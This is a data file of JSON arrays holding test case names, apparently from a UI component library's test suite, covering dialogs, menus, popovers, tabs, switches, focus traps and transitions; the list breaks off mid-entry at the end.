[ "should be possible to override the `tabIndex`", "should transition in completely (duration defined in seconds)", "should transition in completely", "should transition in and out completely", "should transition in and out completely (render strategy = hidden)", "should not unmount the whole tree when some children are still transitioning" ]
[ "should be possible to get the text value from an element", "should strip out emojis when receiving the text from the element", "should strip out hidden elements", "should strip out aria-hidden elements", "should strip out role=\"img\" elements", "should be possible to get the text value from the aria-label", "should be possible to get the text value from the aria-label (even if there is content)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`, multiple)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents, multiple)", "A transition without appear=true does not insert classes during SSR", "should not overwrite className of children when as=Fragment", "should be possible to use a DescriptionProvider without using a Description", "should be possible to use a DescriptionProvider and a single Description, and have them linked", "should be possible to use a DescriptionProvider and multiple Description components, and have them linked", "should be possible to inert an element", "should not mark an element as inert when the hook is disabled", "should mark the element as not inert anymore, once all references are gone", "should be possible to transition", "should expose the correct components", "should render a `Field` component", "should render a `Field` component with a render prop", "should add `aria-disabled` when a `Field` is disabled", "should inherit the `disabled` state from a parent `Fieldset`", "should expose focus data attributes on the element", "should expose hover data attributes on the element", "should encode an input of {\"a\":\"b\"} to an form data output", "should encode an input of [1,2,3] to an form data 
output", "should encode an input of {\"id\":1,\"admin\":true,\"name\":{\"first\":\"Jane\",\"last\":\"Doe\",\"nickname\":{\"preferred\":\"JDoe\"}}} to an form data output", "should error when using an as=\"template\" with additional props", "should forward the props to the first child", "should forward the props via Functional Components", "should allow use of <slot> as children", "as=element", "as=template", "should fire the correct events 0", "should fire the correct events 1", "should fire the correct events 2", "should fire the correct events 3", "should fire the correct events 4", "should fire the correct events 5", "should fire the correct events 6", "should fire the correct events 7", "should fire the correct events 8", "should fire the correct events 9", "should fire the correct events 10", "should fire the correct events 11", "should fire the correct events 12", "should fire the correct events 13", "should fire the correct events 14", "should fire the correct events 15", "should fire the correct events 16", "should fire the correct events 17", "should fire the correct events 18", "should fire the correct events 19", "should fire the correct events 20", "should fire the correct events 21", "should be possible to server side render the Disclosure in a closed state", "should be possible to server side render the Disclosure in an open state", "should be possible to server side render the first Tab and Panel", "should be possible to server side render the defaultIndex Tab and Panel", "should render a `Fieldset` component", "should add an `aria-disabled` attribute when disabling the `Fieldset`", "should link a `Fieldset` to a nested `Legend`", "should not link a `Label` inside a `Field` to the `Fieldset`", "should be possible to cancel a transition at any time", "should be possible to server side render the selectedIndex=0 Tab and Panel", "should be possible to server side render the selectedIndex=1 Tab and Panel", "should be possible to use a LabelProvider 
without using a Label", "should be possible to use a LabelProvider and a single Label, and have them linked", "should be possible to use a LabelProvider and multiple Label components, and have them linked", "should be possible to use useLabels without using a Label", "should be possible to use useLabels and a single Label, and have them linked", "should be possible to use useLabels and multiple Label components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Label component", "should be possible to use useDescriptions without using a Description", "should be possible to use useDescriptions and a single Description, and have them linked", "should be possible to use useDescriptions and multiple Description components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Description component", "should be possible to use a Portal", "should be possible to use multiple Portal elements", "should cleanup the Portal root when the last Portal is unmounted", "should be possible to render multiple portals at the same time", "should be possible to tamper with the modal root and restore correctly", "should be possible to force the Portal into a specific element using Portal.Group", "should render a button", "should default to `type=\"button\"`", "should render a button using a render prop", "should map the `autoFocus` prop to a `data-autofocus` attribute", "should be possible to render a dummy component", "should be possible to merge classes when rendering", "should be possible to merge class fns when rendering", "should be possible to render a dummy component with some children as a callback", "should be possible to add a ref with a different name", "should be possible to passthrough props to a dummy component", "should be possible to change the underlying DOM node using the `as` prop", "should be possible to change the underlying DOM node using the `as` prop and still 
have a function as children", "should be possible to render the children only when the `as` prop is set to Fragment", "should forward all the props to the first child when using an as={Fragment}", "should error when we are rendering a Fragment with multiple children", "should not error when we are rendering a Fragment with multiple children when we don't passthrough additional props", "should error when we are applying props to a Fragment when we do not have a dedicated element", "should be possible to render a `static` dummy component (show = true)", "should be possible to render a `static` dummy component (show = false)", "should be possible to render an `unmount` dummy component (show = true)", "should be possible to render an `unmount` dummy component (show = false)", "should be possible to render an `unmount={false}` dummy component (show = true)", "should be possible to render an `unmount={false}` dummy component (show = false)", "should result in a typescript error", "should focus the first focusable element inside the FocusTrap", "should focus the autoFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap even if another element has autoFocus", "should warn when there is no focusable element inside the FocusTrap", "should not be possible to programmatically escape the focus trap", "should restore the previously focused element, before entering the FocusTrap, after the FocusTrap unmounts", "should stay in the FocusTrap when using `tab`, if there is only 1 focusable element", "should stay in the FocusTrap when using `shift+tab`, if there is only 1 focusable element", "should be possible to tab to the next focusable element within the focus trap", "should be possible to shift+tab to the previous focusable element within the focus trap", "should skip the initial \"hidden\" elements within the focus trap", "should be possible skip 
\"hidden\" elements within the focus trap", "should be possible skip disabled elements within the focus trap", "should not be possible to escape the FocusTrap due to strange tabIndex usage", "should be possible tab to the next focusable element within the focus trap", "should be possible shift+tab to the previous focusable element within the focus trap", "SSR-rendering a Portal should not error", "should be possible to force the Portal into a specific element using PortalGroup", "should render a control", "should have an `id` attached", "should be possible to override the `id`", "should mark the control as disabled, if the `Field` is disabled", "should link a control and a `Label` when inside a `Field`", "should link a control and multiple `Label` components when inside a `Field`", "should link a control and a `Description` when inside a `Field`", "should link a control and multiple `Description` components when inside a `Field`", "should link a control with a `Label` and a `Description` when inside a `Field`", "should be possible to click a `Label`, and focus the control when in a `Field`", "should not be possible to click a `Label`, if the `Label` has the `passive` prop", "should not be possible to click a `Label` and focus the control, if the control is disabled", "should not be possible to click a `Label` and focus the control, if the `Field` is disabled", "should not be possible to click a `Label` and focus the control, if the `Fieldset` is disabled", "should render native (hidden) form elements for the control", "should submit the form with all the data", "should reset the control when the form is reset", "should be possible to render a Switch without crashing", "should be possible to render an (on) Switch using a render prop", "should be possible to render an (off) Switch using a render prop", "should be possible to render an (on) Switch using an `as` prop", "should be possible to render an (off) Switch using an `as` prop", "should be possible to use the 
switch contents as the label", "should set the `type` to \"button\" by default", "should not set the `type` to \"button\" if it already contains a `type`", "should set the `type` to \"button\" when using the `as` prop which resolves to a \"button\"", "should not set the type if the \"as\" prop is not a \"button\"", "should not set the `type` to \"button\" when using the `as` prop which resolves to a \"div\"", "should be possible to use in an uncontrolled way", "should be possible to use in an uncontrolled way with a value", "should be possible to provide a default value", "should be possible to reset to the default value if the form is reset", "should still call the onChange listeners when choosing new values", "should have a default tabIndex of `0`", "should not be possible to override the `tabIndex` to `-1`", "should be possible to render a SwitchGroup, Switch and SwitchLabel", "should be possible to render a SwitchGroup, Switch and SwitchLabel (before the Switch)", "should be possible to render a SwitchGroup, Switch and SwitchLabel (after the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (after the Switch)", "should be possible to render a Switch.Group, Switch, Switch.Label and Switch.Description", "should be possible to put classes on a SwitchLabel", "should be possible to put classes on a SwitchDescription", "should be possible to put classes on a SwitchGroup", "should be possible to toggle the Switch with Space", "should not be possible to use Enter to toggle the Switch", "should submit the form on `Enter`", "should submit the form on `Enter` (when no submit button was found)", "should be possible to tab away from the Switch", "should be possible to toggle the Switch with a click", "should be possible to toggle the Switch with a click on the Label", "should not be possible to toggle the Switch with a click on the Label 
(passive)", "should be possible to set the `form`, which is forwarded to the hidden inputs", "should be possible to submit a form with an boolean value", "should be possible to submit a form with a provided string value", "should error when we are using a <Disclosure.Button /> without a parent <Disclosure />", "should error when we are using a <Disclosure.Panel /> without a parent <Disclosure />", "should be possible to render a Disclosure without crashing", "should be possible to render a Disclosure using a render prop", "should be possible to render a Disclosure in an open state by default", "should expose a close function that closes the disclosure", "should expose a close function that closes the disclosure and restores to a specific element", "should expose a close function that closes the disclosure and restores to a ref", "should not crash when using Suspense boundaries", "should be possible to render a Disclosure.Button using a render prop", "should be possible to render a Disclosure.Button using a render prop and an `as` prop", "should be possible to render Disclosure.Panel using a render prop", "should be possible to always render the Disclosure.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Disclosure.Panel", "should be possible to control the Disclosure.Panel by wrapping it in a Transition component", "should be possible to open the Disclosure with Enter", "should not be possible to open the disclosure with Enter when the button is disabled", "should be possible to close the disclosure with Enter when the disclosure is open", "should be possible to open the disclosure with Space", "should not be possible to open the disclosure with Space when the button is disabled", "should be possible to close the disclosure with Space when the disclosure is open", "should be possible to open a disclosure on click", "should not be possible to open a disclosure on right click", "should not be possible to open a 
disclosure on click when the button is disabled", "should be possible to close a disclosure on click", "should be possible to close the Disclosure by clicking on a Disclosure.Button inside a Disclosure.Panel", "should error when we are using a <RadioGroupOption /> without a parent <RadioGroup />", "should be possible to render a RadioGroup without crashing", "should be possible to render a RadioGroup without options and without crashing", "should be possible to render a RadioGroup, where the first element is tabbable (value is undefined)", "should be possible to render a RadioGroup, where the first element is tabbable (value is null)", "should be possible to render a RadioGroup with an active value", "should guarantee the radio option order after a few unmounts", "should be possible to render a RadioGroupOption with a render prop", "should set the checked v-slot info to true for the selected item (testing with objects, because Vue proxies)", "should be possible to put classes on a RadioGroup", "should be possible to put classes on a RadioGroupOption", "should be possible to disable a RadioGroup", "should be possible to disable a RadioGroup.Option", "should guarantee the order of DOM nodes when performing actions", "should be possible to use a custom component using the `as` prop without crashing", "should use object equality by default", "should be possible to compare null values by a field", "should be possible to compare objects by a field", "should be possible to compare objects by a comparator function", "should be possible to reset to the default value if the form is reset (using objects)", "should be possible to tab to the first item", "should not change the selected element on focus", "should be possible to tab to the active item", "should not change the selected element on focus (when selecting the active item)", "should be possible to tab out of the radio group (no selected value)", "should be possible to tab out of the radio group (selected value)", 
"should go to the previous item when pressing the ArrowLeft key", "should go to the previous item when pressing the ArrowUp key", "should go to the next item when pressing the ArrowRight key", "should go to the next item when pressing the ArrowDown key", "should select the current option when pressing space", "should select the current option only once when pressing space", "should be possible to change the current radio group value when clicking on a radio option", "should be a no-op when clicking on the same item", "should be possible to submit a form with a value", "should be possible to submit a form with a complex value object", "should generate css for an exposed state", "should generate the inverse \"not\" css for an exposed state", "should generate the ui-focus-visible variant", "should generate the ui-not-focus-visible variant", "should error when we are using a <DisclosureButton /> without a parent <Disclosure />", "should error when we are using a <DisclosurePanel /> without a parent <Disclosure />", "should be possible to render a DisclosureButton using a render prop", "should be possible to render a DisclosureButton using a render prop and an `as` prop", "should be possible to render DisclosurePanel using a render prop", "should be possible to always render the DisclosurePanel if we provide it a `static` prop", "should be possible to use a different render strategy for the DisclosurePanel", "should always open the DisclosurePanel because of a wrapping OpenClosed component", "should always close the DisclosurePanel because of a wrapping OpenClosed component", "should be possible to read the OpenClosed state", "should be possible to close the Disclosure by clicking on a DisclosureButton inside a DisclosurePanel", "should be possible to put the checkbox in an indeterminate state", "should be possible to put the checkbox in an default checked state", "should render a checkbox in an unchecked state", "should be possible to toggle a checkbox", "should be 
possible to toggle a checkbox by clicking it", "should be possible to render a Switch.Group, Switch and Switch.Label", "should be possible to render a Switch.Group, Switch and Switch.Label (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Label (after the Switch)", "should error when we are using a <RadioGroup.Option /> without a parent <RadioGroup />", "should expose internal data as a render prop", "should error when we are using a <PopoverButton /> without a parent <Popover />", "should error when we are using a <PopoverPanel /> without a parent <Popover />", "should error when we are using a <PopoverOverlay /> without a parent <Popover />", "should be possible to render a Popover without crashing", "should be possible to render a PopoverGroup with multiple Popover components", "should be possible to render a Popover using a render prop", "should expose a close function that closes the popover", "should expose a close function that closes the popover and restores to a specific element", "should expose a close function that closes the popover and restores to a ref", "should be possible to render a PopoverButton using a render prop", "should be possible to render a PopoverButton using a render prop and an `as` prop", "should be possible to render PopoverPanel using a render prop", "should be possible to always render the PopoverPanel if we provide it a `static` prop", "should be possible to use a different render strategy for the PopoverPanel", "should be possible to move the focus inside the panel to the first focusable element (very first link)", "should close the Popover, when PopoverPanel has the focus prop and you focus the open button", "should be possible to move the focus inside the panel to the first focusable element (skip hidden link)", "should be possible to move the focus inside the panel to the first focusable element (very first link) when the hidden render strategy is used", "should always open the PopoverPanel 
because of a wrapping OpenClosed component", "should always close the PopoverPanel because of a wrapping OpenClosed component", "should be possible to open the Popover with Enter", "should not be possible to open the popover with Enter when the button is disabled", "should be possible to close the popover with Enter when the popover is open", "should close other popover menus when we open a new one", "should close the Popover by pressing `Enter` on a PopoverButton inside a PopoverPanel", "should close the Popover menu, when pressing escape on the PopoverButton", "should close the Popover menu, when pressing escape on the PopoverPanel", "should be possible to close a sibling Popover when pressing escape on a sibling PopoverButton", "should be possible to Tab through the panel contents onto the next PopoverButton", "should be possible to place a focusable item in the PopoverGroup, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the PopoverGroup", "should close the Popover menu once we Tab out of the Popover", "should close the Popover menu once we Tab out of a Popover without focusable elements", "should close the Popover when the PopoverPanel has a focus prop", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal)", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal), and focus the next focusable item in line", "should focus the previous PopoverButton when Shift+Tab on the second PopoverButton", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel (inside a Portal)", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (heuristc based portal)", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next 
PopoverButton", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton (using Portal's)", "should be possible to open the popover with Space", "should not be possible to open the popover with Space when the button is disabled", "should be possible to close the popover with Space when the popover is open", "should close the Popover by pressing `Space` on a PopoverButton inside a PopoverPanel", "should close the Popover by pressing `Enter` on a PopoverButton and go to the href of the `a` inside a PopoverPanel", "should be possible to open a popover on click", "should not be possible to open a popover on right click", "should not be possible to open a popover on click when the button is disabled", "should be possible to close a popover on click", "should be possible to close a Popover using a click on the PopoverOverlay", "should be possible to close the popover, and re-focus the button when we click outside on the body element", "should be possible to close the popover, and re-focus the button when we click outside on a non-focusable element", "should be possible to close the popover, by clicking outside the popover on another focusable element", "should be possible to close the popover, by clicking outside the popover on another element inside a focusable element", "should be possible to close the Popover by clicking on a PopoverButton inside a PopoverPanel", "should not close the Popover when clicking on a focusable element inside a static PopoverPanel", "should not close the Popover when clicking on a non-focusable element inside a static PopoverPanel", "should close the Popover when clicking outside of a static PopoverPanel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel (when using the `focus` prop)", "should not close the Popover if the focus is 
moved outside of the Popover but still in the same React tree using Portals", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using nested Portals", "should be possible to nest Popover components and control them individually", "should not steal the ref from the child", "should render without crashing", "should be possible to render a Transition without children", "should yell at us when we forget the required show prop", "should render a div and its children by default", "should passthrough all the props (that we do not use internally)", "should render another component if the `as` prop is used and its children by default", "should passthrough all the props (that we do not use internally) even when using an `as` prop", "should render nothing when the show prop is false", "should be possible to change the underlying DOM tag", "should be possible to use a render prop", "should yell at us when we forget to forward the ref when using a render prop", "should yell at us when we forget to wrap the `<Transition.Child />` in a parent <Transition /> component", "should be possible to render a Transition.Child without children", "should be possible to use a Transition.Root and a Transition.Child", "should be possible to nest transition components", "should be possible to change the underlying DOM tag of the Transition.Child components", "should be possible to change the underlying DOM tag of the Transition component and Transition.Child components", "should be possible to use render props on the Transition.Child components", "should be possible to use render props on the Transition and Transition.Child components", "should yell at us when we forgot to forward the ref on one of the Transition.Child components", "should yell at us when we forgot to forward a ref on the Transition component", "should support new lines in class lists", "should be possible to passthrough the transition classes", "should be possible to 
passthrough the transition classes and immediately apply the enter transitions when appear is set to true", "should fire only one event for a given component change", "should error when we are using a <MenuButton /> without a parent <Menu />", "should error when we are using a <MenuItems /> without a parent <Menu />", "should error when we are using a <MenuItem /> without a parent <Menu />", "should be possible to render a Menu without crashing", "should not crash when rendering no children at all", "should be possible to render a Menu using a default render prop", "should be possible to render a Menu using a template `as` prop", "should yell when we render a Menu using a template `as` prop (default) that contains multiple children (if we passthrough props)", "should be possible to manually close the Menu using the exposed close function", "should be possible to render a MenuButton using a default render prop", "should be possible to render a MenuButton using a template `as` prop", "should be possible to render a MenuButton using a template `as` prop and a custom element", "should yell when we render a MenuButton using a template `as` prop that contains multiple children", "should be possible to render MenuItems using a default render prop", "should be possible to render MenuItems using a template `as` prop", "should yell when we render MenuItems using a template `as` prop that contains multiple children", "should be possible to always render the MenuItems if we provide it a `static` prop", "should be possible to use a different render strategy for the MenuItems", "should be possible to render MenuItem using a default render prop", "should be possible to render a MenuItem using a template `as` prop", "should not override an explicit disabled prop on MenuItems child", "should yell when we render a MenuItem using a template `as` prop that contains multiple children", "should be possible to swap the menu item with a button for example", "should mark all the elements 
between Menu.Items and Menu.Item with role none", "should always open the MenuItems because of a wrapping OpenClosed component", "should always close the MenuItems because of a wrapping OpenClosed component", "should be possible to render a TransitionChild that inherits state from the Menu", "should be possible to use a button as a menu item and invoke it upon Enter", "should be possible to open the menu with Enter", "should not be possible to open the menu with Enter when the button is disabled", "should have no active menu item when there are no menu items at all", "should focus the first non disabled menu item when opening with Enter", "should focus the first non disabled menu item when opening with Enter (jump over multiple disabled ones)", "should have no active menu item upon Enter key press, when there are no non-disabled menu items", "should be possible to close the menu with Enter when there is no active menuitem", "should be possible to close the menu with Enter and invoke the active menu item", "should be possible to open the menu with Space", "should not be possible to open the menu with Space when the button is disabled", "should focus the first non disabled menu item when opening with Space", "should focus the first non disabled menu item when opening with Space (jump over multiple disabled ones)", "should have no active menu item upon Space key press, when there are no non-disabled menu items", "should be possible to close the menu with Space when there is no active menuitem", "should be possible to close the menu with Space and invoke the active menu item", "should be possible to close an open menu with Escape", "should not focus trap when we use Tab", "should not focus trap when we use Shift+Tab", "should be possible to open the menu with ArrowDown", "should not be possible to open the menu with ArrowDown when the button is disabled", "should be possible to use ArrowDown to navigate the menu items", "should be possible to use ArrowDown to navigate 
the menu items and skip the first disabled one", "should be possible to use ArrowDown to navigate the menu items and jump to the first non-disabled one", "should be possible to open the menu with ArrowUp and the last item should be active", "should be possible to use ArrowUp to navigate the menu items and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled item", "should be possible to use ArrowUp to navigate the menu items", "should be possible to use the End key to go to the last menu item", "should be possible to use the End key to go to the last non disabled menu item", "should be possible to use the End key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon End key press, when there are no non-disabled menu items", "should be possible to use the PageDown key to go to the last menu item", "should be possible to use the PageDown key to go to the last non disabled menu item", "should be possible to use the PageDown key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon PageDown key press, when there are no non-disabled menu items", "should be possible to use the Home key to go to the first menu item", "should be possible to use the Home key to go to the first non disabled menu item", "should be possible to use the Home key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon Home key press, when there are no non-disabled menu items", "should be possible to use the PageUp key to go to the first menu item", "should be possible to use the PageUp key to go to the first non disabled menu item", "should be possible to use the PageUp key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon PageUp key press, when there are no non-disabled menu items", "should be 
possible to type a full word that has a perfect match", "should be possible to type a partial of a word", "should be possible to type words with spaces", "should not be possible to search for a disabled item", "should be possible to search for a word (case insensitive)", "should be possible to search for the next occurence", "should stay on the same item while keystrokes still match", "should be possible to open a menu on click", "should not be possible to open a menu on right click", "should not be possible to open a menu on click when the button is disabled", "should be possible to close a menu on click", "should be a no-op when we click outside of a closed menu", "should be possible to click outside of the menu which should close the menu", "should be possible to click outside of the menu which should close the menu (even if we press the menu button)", "should be possible to click outside of the menu on another menu button which should close the current menu and open the new menu", "should be possible to hover an item and make it active", "should make a menu item active when you move the mouse over it", "should be a no-op when we move the mouse and the menu item is already active", "should be a no-op when we move the mouse and the menu item is disabled", "should not be possible to hover an item that is disabled", "should be possible to mouse leave an item and make it inactive", "should be possible to mouse leave a disabled item and be a no-op", "should be possible to click a menu item, which closes the menu", "should be possible to click a menu item, which closes the menu and invokes the @click handler", "should be possible to click a disabled menu item, which is a no-op", "should be possible focus a menu item, so that it becomes active", "should not be possible to focus a menu item which is disabled", "should not be possible to activate a disabled item", "should error when we are using a <DialogOverlay /> without a parent <Dialog />", "should error when we are 
using a <DialogTitle /> without a parent <Dialog />", "should error when we are using a <DialogBackdrop /> without a parent <Dialog />", "should error when we are using a <DialogPanel /> without a parent <Dialog />", "should be possible to render a Dialog without crashing", "should be possible to access the ref on the DialogBackdrop", "should be possible to access the ref on the DialogPanel", "should complain when an `open` prop is missing", "should be able to explicitly choose role=dialog", "should be able to explicitly choose role=alertdialog", "should fall back to role=dialog for an invalid role", "should complain when an `open` prop is not a boolean", "should be possible to render a Dialog using a render prop", "should be possible to pass props to the Dialog itself", "should be possible to always render the Dialog if we provide it a `static` prop (and enable focus trapping based on `open`)", "should be possible to always render the Dialog if we provide it a `static` prop (and disable focus trapping based on `open`)", "should be possible to use a different render strategy for the Dialog", "should add a scroll lock to the html tag", "should wait to add a scroll lock to the html tag when unmount is false in a Transition", "scroll locking should work when transitioning between dialogs", "should remove the scroll lock when the open closed state is `Closing`", "should not have a scroll lock when the transition marked as not shown", "should be possible to render DialogOverlay using a render prop", "should throw an error if a DialogBackdrop is used without a DialogPanel", "should not throw an error if a DialogBackdrop is used with a DialogPanel", "should portal the DialogBackdrop", "should be possible to render DialogTitle using a render prop", "should be possible to render DialogDescription using a render prop", "should be possible to open a dialog from inside a Popover (and then close it)", "should be possible to open the Dialog via a Transition component", "should 
be possible to close the Dialog via a Transition component", "should be possible to close the dialog with Escape", "should be possible to close the dialog with Escape, when a field is focused", "should not be possible to close the dialog with Escape, when a field is focused but cancels the event", "should be possible to tab around when using the initialFocus ref", "should be possible to tab around when using the initialFocus ref on a component", "should not escape the FocusTrap when there is only 1 focusable element (going forwards)", "should not escape the FocusTrap when there is only 1 focusable element (going backwards)", "should be possible to close a Dialog using a click on the DialogOverlay", "should not close the Dialog when clicking on contents of the Dialog.Overlay", "should be possible to close the dialog, and re-focus the button when we click outside on the body element", "should be possible to close the dialog, and keep focus on the focusable element", "should stop propagating click events when clicking on the Dialog.Overlay", "should be possible to submit a form inside a Dialog", "should stop propagating click events when clicking on an element inside the Dialog", "should should be possible to click on removed elements without closing the Dialog", "should be possible to click on elements created by third party libraries", "should be possible to focus elements created by third party libraries", "should be possible to click elements inside the dialog when they reside inside a shadow boundary", "should close the Dialog if we click outside the DialogPanel", "should not close the Dialog if we click inside the DialogPanel", "should not close the dialog if opened during mouse up", "should not close the dialog if click starts inside the dialog but ends outside", "should be possible to open nested Dialog components and close them with `Escape`", "should be possible to open nested Dialog components and close them with `Outside Click`", "should be possible to 
open nested Dialog components and close them with `Click on Dialog.Overlay`", "should error when we are using a <Menu.Button /> without a parent <Menu />", "should error when we are using a <Menu.Items /> without a parent <Menu />", "should error when we are using a <Menu.Item /> without a parent <Menu />", "should be possible to render a Menu using a render prop", "should be possible to render a Menu.Button using a render prop", "should be possible to render a Menu.Button using a render prop and an `as` prop", "should be possible to render Menu.Items using a render prop", "should be possible to always render the Menu.Items if we provide it a `static` prop", "should be possible to use a different render strategy for the Menu.Items", "should be possible to render a Menu.Item using a render prop", "should be possible to conditionally render classNames (aka className can be a function?!)", "should be possible to wrap the Menu.Items with a Transition component", "should be possible to wrap the Menu.Items with a Transition.Child component", "should close when we use Tab", "should focus trap when we use Shift+Tab", "should not be possible to open the menu with ArrowUp and the last item should be active when the button is disabled", "should be possible to click outside of the menu, on an element which is within a focusable element, which closes the menu", "should error when we are using a <Dialog.Overlay /> without a parent <Dialog />", "should error when we are using a <Dialog.Title /> without a parent <Dialog />", "should error when we are using a <Dialog.Backdrop /> without a parent <Dialog />", "should error when we are using a <Dialog.Panel /> without a parent <Dialog />", "should complain when the `open` and `onClose` prop are missing", "should complain when an `open` prop is provided without an `onClose` prop", "should complain when an `onClose` prop is provided without an `open` prop", "should complain when an `onClose` prop is not a function", "should be possible 
to render Dialog.Overlay using a render prop", "should throw an error if a Dialog.Backdrop is used without a Dialog.Panel", "should not throw an error if a Dialog.Backdrop is used with a Dialog.Panel", "should portal the Dialog.Backdrop", "should be possible to render Dialog.Title using a render prop", "should be possible to render Dialog.Description using a render prop", "should be possible to close a Dialog using a click on the Dialog.Overlay", "should not close the Dialog if it starts open and we click inside the Dialog when it has only a panel", "should close the Dialog if we click outside the Dialog.Panel", "should not close the Dialog if we click inside the Dialog.Panel", "should be possible to open nested Dialog components (visible when mounted) and close them with `Escape`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Outside Click`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Click on Dialog.Overlay`", "should be possible to open nested Dialog components (visible when always) and close them with `Escape`", "should be possible to open nested Dialog components (visible when always) and close them with `Outside Click`", "should error when we are using a <Popover.Button /> without a parent <Popover />", "should error when we are using a <Popover.Panel /> without a parent <Popover />", "should error when we are using a <Popover.Overlay /> without a parent <Popover />", "should be possible to render a Popover.Group with multiple Popover components", "should expose a close function that closes the popover and takes an event", "should be possible to get a ref to the Popover", "should be possible to use a Fragment with an optional ref", "should be possible to render a Popover.Button using a fragment", "should be possible to render a Popover.Button using a render prop", "should be possible to render a Popover.Button using a render prop and an `as` prop", 
"should be possible to render Popover.Panel using a render prop", "should be possible to always render the Popover.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Popover.Panel", "should close the Popover, when Popover.Panel has the focus prop and you focus the open button", "should warn when you are using multiple `Popover.Button` components", "should warn when you are using multiple `Popover.Button` components (wrapped in a Transition)", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel`", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel` (wrapped in a Transition)", "should warn when you are using multiple `Popover.Button` components in a nested `Popover`", "should not warn when you are using multiple `Popover.Button` components in a nested `Popover.Panel`", "should be possible to wrap the Popover.Panel with a Transition component", "should close the Popover by pressing `Enter` on a Popover.Button inside a Popover.Panel", "should close the Popover menu, when pressing escape on the Popover.Button", "should close the Popover menu, when pressing escape on the Popover.Panel", "should be possible to close a sibling Popover when pressing escape on a sibling Popover.Button", "should be possible to Tab through the panel contents onto the next Popover.Button", "should be possible to place a focusable item in the Popover.Group, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the Popover.Group", "should close the Popover when the Popover.Panel has a focus prop", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal)", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal), and focus the next focusable item in line", "should focus the previous Popover.Button when Shift+Tab on 
the second Popover.Button", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (inside a Portal)", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button (using Portal's)", "should close the Popover by pressing `Space` on a Popover.Button inside a Popover.Panel", "should close the Popover by pressing `Enter` on a Popover.Button and go to the href of the `a` inside a Popover.Panel", "should be possible to close a Popover using a click on the Popover.Overlay", "should be possible to close the Popover by clicking on a Popover.Button inside a Popover.Panel", "should not close the Popover when clicking on a focusable element inside a static Popover.Panel", "should not close the Popover when clicking on a non-focusable element inside a static Popover.Panel", "should close the Popover when clicking outside of a static Popover.Panel", "should trigger the `change` when the tab changes", "should error when we are using a <TabList /> without a parent <TabGroup /> component", "should error when we are using a <Tab /> without a parent <TabGroup /> component", "should error when we are using a <TabPanels /> without a parent <TabGroup /> component", "should error when we are using a <TabPanel /> without a parent <TabGroup /> component", "should be possible to render TabGroup without crashing", "should be possible to render the TabPanels first, then the TabList", "should guarantee the order when injecting new tabs dynamically", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (controlled component)", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing 
actions (uncontrolled component)", "should expose the `selectedIndex` on the `Tabs` component", "should expose the `selectedIndex` on the `TabList` component", "should expose the `selectedIndex` on the `TabPanels` component", "should expose the `selected` state on the `Tab` components", "should expose the `selected` state on the `TabPanel` components", "should jump to the nearest tab when the defaultIndex is out of bounds (-2)", "should jump to the nearest tab when the defaultIndex is out of bounds (+5)", "should jump to the next available tab when the defaultIndex is a disabled tab", "should jump to the next available tab when the defaultIndex is a disabled tab and wrap around", "should not change the Tab if the defaultIndex changes", "should select first tab if no tabs were provided originally", "should select first tab if no tabs were provided originally (with a defaultIndex of 1)", "should not change the tab in a controlled component if you do not respond to the @change", "should be possible to change active tab controlled and uncontrolled", "should jump to the nearest tab when the selectedIndex is out of bounds (-2)", "should jump to the nearest tab when the selectedIndex is out of bounds (+5)", "should jump to the next available tab when the selectedIndex is a disabled tab", "should jump to the next available tab when the selectedIndex is a disabled tab and wrap around", "should prefer selectedIndex over defaultIndex", "should wrap around when overflowing the index when using a controlled component", "should wrap around when underflowing the index when using a controlled component", "should be possible to tab to the default initial first tab", "should be possible to tab to the default index tab", "should be possible to go to the next item (activation = `auto`)", "should be possible to go to the next item (activation = `manual`)", "should wrap around at the end (activation = `auto`)", "should wrap around at the end (activation = `manual`)", "should not be 
